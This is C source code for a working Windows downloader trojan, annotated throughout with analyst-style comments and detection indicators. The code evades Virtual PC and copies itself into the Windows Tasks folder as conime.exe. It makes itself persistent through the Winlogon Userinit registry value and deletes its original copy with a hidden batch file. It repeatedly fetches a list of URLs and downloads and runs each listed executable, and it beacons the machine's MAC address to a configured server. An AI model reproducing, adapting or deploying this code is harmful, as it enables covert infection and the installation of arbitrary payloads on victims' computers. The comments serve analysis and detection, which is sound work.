#include <stdio.h>
#include <shlwapi.h>
#include<wininet.h>
#pragma comment(lib,"wininet.lib")
#pragma comment(lib,"shlwapi.lib")
#pragma comment(lib,"MSVCRT.lib")
#pragma comment (lib,"Urlmon.lib")
#pragma comment(linker, "/OPT:NOWIN98") //è¡ÏûÕa¼¸DDμÄ×¢êí£¬±àòë3öμÄÎļtÖ»óD2K′óD¡
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker,"/ENTRY:ProcEntry /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")
#include <time.h>
#include <winsock.h>
#include <stdlib.h>
#include <Wininet.h>
#include<Aclapi.h>
#include <io.h>
#pragma comment(lib,"Wininet.lib")
#pragma comment(lib,"ws2_32")
// Global function pointer for urlmon!URLDownloadToFileA. It is resolved at run
// time in DownExe via LoadLibrary/GetProcAddress, so the API never appears in
// the import table. (Original comment: "dynamically load the UrlDownloadToFileA
// function from Urlmon.dll".) Note: this declares a single pointer variable
// named DOWNFILE, not a typedef.
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);
// Module handle of urlmon.dll; assigned in DownExe and never released.
HINSTANCE hurlmon;
// Naive substring search over a raw memory buffer.
// mem/sizem: haystack and its length. str/sizes: needle and its length;
// sizes == 0 means "use strlen(str)". Returns the offset of the first match
// or -1. There is no bound check on i+j, so when the needle does not fit in
// the remaining haystack the comparison reads past mem[sizem-1].
int memfind(const char *mem, const char *str, int sizem, int sizes)
{
int da,i,j;
if (sizes == 0) da = strlen(str);
else da = sizes;
for (i = 0; i < sizem; i++)
{
for (j = 0; j < da; j ++)
if (mem[i+j] != str[j]) break;
if (j == da) return i; // every needle byte matched at offset i
}
return -1;
}
#define MAX_CONFIG_LEN 500
// Looks up a configuration marker in the last MAX_CONFIG_LEN bytes of the
// running executable (the configuration is presumably appended to the image
// after build; the callers in this file use the markers "OOOOOO", "CCCCCC"
// and "VVVVVV"). Returns a pointer to the marker inside a freshly allocated
// MAX_CONFIG_LEN-byte heap buffer, or NULL when the file cannot be opened or
// the marker is absent. The buffer is not NUL-terminated and the returned
// pointer is never freed by any caller in this file.
// (Original comment: "look up the configuration info at the end of the file".)
LPCTSTR FindConfigString( LPCTSTR lpString)
{
char strFileName[MAX_PATH];
char *lpConfigString = NULL;
DWORD dwBytesRead = 0;
GetModuleFileName(0, strFileName, sizeof(strFileName)); // path of the running image
HANDLE hFile = CreateFile(strFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
return NULL;
}
SetFilePointer(hFile, -MAX_CONFIG_LEN, NULL, FILE_END); // seek to the tail of the image
lpConfigString = new char[MAX_CONFIG_LEN];
ReadFile(hFile, lpConfigString, MAX_CONFIG_LEN, &dwBytesRead, NULL); // dwBytesRead is not examined
CloseHandle(hFile);
int offset = memfind(lpConfigString, lpString, MAX_CONFIG_LEN, 0);
if (offset == -1)
{
delete lpConfigString; // allocated with new[] but released with scalar delete
return NULL;
}
else
{
return lpConfigString + offset; // points at the marker itself; callers skip it
}
}
// Second-stage downloader. Reads the "OOOOOO" configuration entry, whose layout
// is "OOOOOO<url>|<save path>", fetches <url> to <save path>, then treats every
// whitespace-separated token in that file as a further URL: each one is
// downloaded to "<temp dir>\<GetTickCount()>.exe" and started with WinExec.
// The list file is deleted afterwards. Returns -1 when the entry has no '|'
// separator, otherwise 0.
// Indicators a defender can use: urlmon.dll loaded at run time and
// URLDownloadToFileA resolved via GetProcAddress (both names are assembled one
// character at a time so they are not plain strings in the binary), and
// numerically named .exe files created and executed from the temp directory.
int DownExe()
{
// "URLDownloadToFileA", built character by character.
char strDown[19];
strDown[0] = 'U';
strDown[1] = 'R';
strDown[2] = 'L';
strDown[3] = 'D';
strDown[4] = 'o';
strDown[5] = 'w';
strDown[6] = 'n';
strDown[7] = 'l';
strDown[8] = 'o';
strDown[9] = 'a';
strDown[10] = 'd';
strDown[11] = 'T';
strDown[12] = 'o';
strDown[13] = 'F';
strDown[14] = 'i';
strDown[15] = 'l';
strDown[16] = 'e';
strDown[17] = 'A';
strDown[18] = '\0';
//MessageBox(0,strDown,"ok", 0);
// "urlmon.dll", built the same way.
char urlmon[11];
urlmon[0] = 'u';
urlmon[1] = 'r';
urlmon[2] = 'l';
urlmon[3] = 'm';
urlmon[4] = 'o';
urlmon[5] = 'n';
urlmon[6] = '.';
urlmon[7] = 'd';
urlmon[8] = 'l';
urlmon[9] = 'l';
urlmon[10] = '\0';
//MessageBox(0,urlmon,"ok", 0);
// "OOOOOO": marker that precedes the download entry in the appended config.
char FindStr[7];
FindStr[0] = 'O';
FindStr[1] = 'O';
FindStr[2] = 'O';
FindStr[3] = 'O';
FindStr[4] = 'O';
FindStr[5] = 'O';
FindStr[6] = '\0';
char *url = NULL;
char *DownUrl = NULL;
char *SavePath = NULL;
url = (char *)FindConfigString(FindStr); // pointer at the marker, or NULL (not tested before strchr)
char *pos = strchr(url, '|'); // original note: unlike the other entries this one holds two values separated by '|'
if (pos == NULL)
return -1;
*pos = '\0'; // terminate the URL in place
DownUrl = url + 6; // skip the six-byte marker
SavePath = pos + 1; // text after the '|'
if (DownUrl == NULL || SavePath == NULL) // both derive from a non-NULL pointer above, so this never triggers
return -1;
//MessageBox(0,DownUrl,"ok",0); // (debug: show the two extracted strings)
//MessageBox(0,SavePath,"ok",0);
hurlmon=LoadLibrary(urlmon);
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,strDown); // resolve URLDownloadToFileA without an import entry
HRESULT hr = DOWNFILE(NULL, DownUrl, SavePath, 0, NULL); // fetch the URL list to SavePath
char strTmpPath[MAX_PATH];
char strRunPath[MAX_PATH];
GetTempPath(sizeof(strTmpPath), strTmpPath);
FILE *stream;
char buffer[200];
stream = fopen(SavePath,"r"); // opened before hr is tested; only dereferenced when hr == S_OK
if (hr== S_OK)
{
while(fscanf(stream,"%s\n",buffer)==1) // one URL per whitespace-separated token
{
wsprintf(strRunPath,"%s\\%d.exe",strTmpPath,GetTickCount()); // e.g. "<temp dir>\123456.exe"
DOWNFILE(0, buffer, strRunPath, 0, 0); // download the payload
//MessageBox(NULL,buffer,"Prompt",MB_ICONINFORMATION);
WinExec(strRunPath, SW_SHOW); // and run it; result not checked
}
fclose(stream);
}
DeleteFile(SavePath); // remove the list file
return 0;
}
// VM / sandbox evasion probe. The original comment (garbled in the listing)
// reads roughly "anti NOD32 scanning", but the body is the classic Virtual PC
// check: it executes the byte sequence 0F 3F 07 0B, which is not a valid
// instruction on a physical CPU and raises an exception; the __except handler
// then returns FALSE. If no exception is raised the code assumes it is running
// under Virtual PC (reportedly the hypervisor intercepts this opcode — to be
// confirmed) and returns TRUE, and ProcEntry exits immediately in that case.
// The remaining bytes C7 45 FC FF FF FF FF encode "mov dword ptr [ebp-4], -1".
// __except(1) is EXCEPTION_EXECUTE_HANDLER, i.e. every exception is swallowed.
bool IsVirtualPC()
{
__try
{
__asm
{
mov eax, 1
_emit 0x0F
_emit 0x3F
_emit 0x07
_emit 0x0B
_emit 0xC7
_emit 0x45
_emit 0xFC
_emit 0xFF
_emit 0xFF
_emit 0xFF
_emit 0xFF
}
}
__except(1)
{
return FALSE; // exception: real hardware
}
return TRUE; // no exception: treated as Virtual PC
}
// Persistence. Rewrites the Winlogon "Userinit" value so that the dropped copy
// at "<windir>\Tasks\conime.exe" is started together with the real
// userinit.exe at every logon. (Original comment: "write the registry run".)
// Value written: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
// Userinit = "<windir>\system32\userinit.exe,<windir>\Tasks\conime.exe" as
// REG_SZ, always with a size of 100 bytes regardless of the string length, so
// the stored data includes whatever uninitialised stack bytes follow the NUL.
// Detection: any change to the Userinit value, or a second comma-separated
// program in it, is a strong persistence indicator. The return codes of
// RegOpenKey and RegSetValueEx are stored in ret but never examined.
void WriteReg()
{
char WinPath[MAX_PATH];
char OldPath[MAX_PATH];
char MyPath[MAX_PATH];
char RegStr[MAX_PATH];
GetWindowsDirectory(WinPath,sizeof(WinPath)); // Windows directory
wsprintf(OldPath,"%s%s",WinPath,"\\system32\\userinit.exe"); // the legitimate userinit
wsprintf(MyPath,"%s%s",WinPath,"\\Tasks\\conime.exe"); // the dropped copy
wsprintf(RegStr,"%s%s%s",OldPath,",",MyPath); // "<real>,<dropped>"
char regname[]="Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon";
HKEY hkResult;
int ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult); // open the key
ret=RegSetValueEx(hkResult,"Userinit",0,REG_SZ,(unsigned char *)RegStr,100); /* set the value (fixed 100-byte size) */
RegCloseKey(hkResult);
}
// Self-deletion. Writes a batch file named afc9fe2f418b00a0.bat in the current
// directory that (1) appends ten junk lines to 3596799a1543bc9f.aqq as a crude
// delay, (2) deletes that file, (3) deletes this executable by its full path,
// (4) deletes the batch file itself and exits. The batch is started hidden via
// WinExec and the process then terminates with ExitProcess.
// Notes: line endings are written as "\n\r" (reversed), and the whole
// 2048-byte command buffer is written including its trailing zero bytes. The
// two fixed file names are useful detection strings.
void uninstall(void)
{
int i;
HANDLE hFile;
DWORD dwWritten;
char selfpathaaa[MAX_PATH]={0};
char command[2048]={0};
char name[]="afc9fe2f418b00a0.bat";
GetModuleFileName(NULL,selfpathaaa,MAX_PATH); // own path, to be deleted by the batch
lstrcpy(command,"@echo off\n\r");
for (i=0;i<10;i++) // ten appends to a scratch file, acting as a delay
lstrcat(command,"@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq\n\r");
lstrcat(command,"@del 3596799a1543bc9f.aqq\n\r");
lstrcat(command,"@del \"");
lstrcat(command,selfpathaaa);
lstrcat(command,"\"\n\r");
lstrcat(command,"@del "); // the batch removes itself last
lstrcat(command,name);
lstrcat(command,"\n\r@exit");
hFile=CreateFile(name,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
WriteFile(hFile,(LPCVOID)command,sizeof(command),&dwWritten,NULL); // full buffer, not strlen
CloseHandle(hFile);
WinExec(name,SW_HIDE);
ExitProcess(NULL); // does not return
}
// Skips a run of leading 'V' characters and returns a pointer to the first
// character that is not 'V'. Used to strip the "VVVVVV" config marker from a
// FindConfigString result. The post-increment loop stops one past the first
// non-'V' byte, hence the --pstr.
char *ltrim_VVVVVV(char *pstr)
{
while(*pstr++=='V');
return --pstr;
}
// Skips a run of leading 'C' characters and returns a pointer to the first
// character that is not 'C'. Used to strip the "CCCCCC" config marker from a
// FindConfigString result. Same overshoot-and-back-off shape as ltrim_VVVVVV.
char *ltrim_CCCCCC(char *pstr)
{
while(*pstr++=='C');
return --pstr;
}
#include "Rpcdce.h"
#pragma comment(lib,"Rpcrt4.lib")
// Install beacon / counter. Reads the "CCCCCC" (counter URL) and "VVVVVV"
// (version string) config entries, takes six bytes from a sequential UUID
// (Data4[2..7]; for UuidCreateSequential this node field is normally derived
// from the primary network adapter's MAC address, which is why the original
// comment calls it a unique mark), formats them as XX-XX-XX-XX-XX-XX and issues
// one HTTP GET of "<CountUrl>?mac=<MAC>&ver=<version>" with the User-Agent
// "Google page" and INTERNET_FLAG_RELOAD. Up to 1024 bytes of the reply are
// read once and discarded. Both FindConfigString results are used without a
// NULL test.
// Detection: outbound requests with this query-string shape and the literal
// User-Agent string "Google page".
void MyCount()
{
char szURL[MAX_PATH];
char *MyUrl = NULL;
char *CountUrl = NULL;
MyUrl = (char *)FindConfigString("CCCCCC");
CountUrl = ltrim_CCCCCC(MyUrl); // counter URL follows the marker
char *pVersionStr = NULL;
char *pVersion = NULL;
pVersionStr = (char *)FindConfigString("VVVVVV");
pVersion = ltrim_VVVVVV(pVersionStr); // version string follows the marker
long rt;
UUID ui;
char mac[6][10]={0};
char temp[MAX_PATH];
char Mac[MAX_PATH];
rt = UuidCreateSequential(&ui);
if (rt == RPC_S_OK)
{
// hex-format the six node bytes; on failure mac[] stays all-empty
_itoa(ui.Data4[2],mac[0],16);
_itoa(ui.Data4[3],mac[1],16);
_itoa(ui.Data4[4],mac[2],16);
_itoa(ui.Data4[5],mac[3],16);
_itoa(ui.Data4[6],mac[4],16);
_itoa(ui.Data4[7],mac[5],16);
}
for(int n=0;n<6;n++)
{
if (strlen(mac[n]) == 1) // left-pad single hex digits with '0'
{
wsprintf(temp, "0%s", mac[n]);
strcpy(mac[n],temp);
}
}
wsprintf(Mac, "%s-%s-%s-%s-%s-%s",mac[0],mac[1],mac[2],mac[3],mac[4],mac[5]);
sprintf(szURL,"%s?mac=%s&ver=%s",CountUrl,Mac,pVersion); // original note: the MAC string serves as a unique identifier
//MessageBox(NULL,szURL,"Prompt",MB_ICONINFORMATION);
HINTERNET hNet = ::InternetOpen("Google page", // user agent; original note: for HTTP this can be anything
PRE_CONFIG_INTERNET_ACCESS, // access type; original note: use the registered (preconfigured) settings to reach a server
NULL,
INTERNET_INVALID_PORT_NUMBER, // original note: equivalent to supplying the default port
0 // flags; original note: later calls on this handle will NOT send status to a callback
) ;
HINTERNET hUrlFile = ::InternetOpenUrl(hNet, // handle returned by InternetOpen
szURL, // the URL to open
NULL, // extra headers for the server; usually NULL
0, // length of the extra headers; usually 0
INTERNET_FLAG_RELOAD, // InternetOpenUrl behaviour flags
0) ; // context value; no status callback will be notified
char buffer[1024] ;
DWORD dwBytesRead = 0;
BOOL bRead = ::InternetReadFile(hUrlFile, // handle returned by InternetOpenUrl
buffer, // buffer receiving the data
sizeof(buffer),
&dwBytesRead); // receives the number of bytes read
// original note: if the call returns TRUE and dwBytesRead is 0, end of file was reached
::InternetCloseHandle(hUrlFile) ;
::InternetCloseHandle(hNet) ;
}
// Program entry point (selected by the /ENTRY:ProcEntry linker pragma at the
// top of the file; there is no main/WinMain). Flow: exit at once if
// IsVirtualPC() reports a VM; if the image is not already running from
// "<windir>\Tasks", install a copy there as conime.exe, set the Winlogon
// Userinit persistence (WriteReg), start the copy hidden and remove the
// original via uninstall(). Otherwise run six rounds of DownExe() followed by
// MyCount(), 20 minutes apart (about two hours in total), then exit.
int ProcEntry()
{
if(IsVirtualPC())
{
return 0; // VM detected: do nothing
}
char Mulu[MAX_PATH];
char WinPath[MAX_PATH];
char MyPath[MAX_PATH];
GetModuleFileName(0,Mulu,sizeof(Mulu));
PathRemoveFileSpec(Mulu); // directory of the running image
GetWindowsDirectory(WinPath,sizeof(WinPath)); // Windows directory
strcat(WinPath,"\\Tasks"); // install directory
GetModuleFileName(0,MyPath,sizeof(MyPath)); // full path of the running image
//MessageBox(NULL,Mulu,"Prompt",MB_ICONINFORMATION);
//MessageBox(NULL,WinPath,"Prompt",MB_ICONINFORMATION);
if (stricmp(Mulu,WinPath) != 0) // not yet running from the install directory: copy itself there
{
strcat(WinPath,"\\conime.exe");
DeleteFile(WinPath); // replace any earlier copy
WriteReg(); // registry persistence so the copy starts at logon
CopyFile(MyPath,WinPath,false);
Sleep(500);
WinExec(WinPath,SW_HIDE); // start the installed copy hidden
Sleep(1000);
uninstall(); // deletes the original and calls ExitProcess; does not return
ExitProcess(0); // unreachable
}
int i = 0;
while(i < 6) // six rounds, 20 minutes apart
{
DownExe();
MyCount(); // beacon / counter
Sleep(20 * 60 * 1000); // 20 minutes
i++;
}
ExitProcess(0);
return 0;
}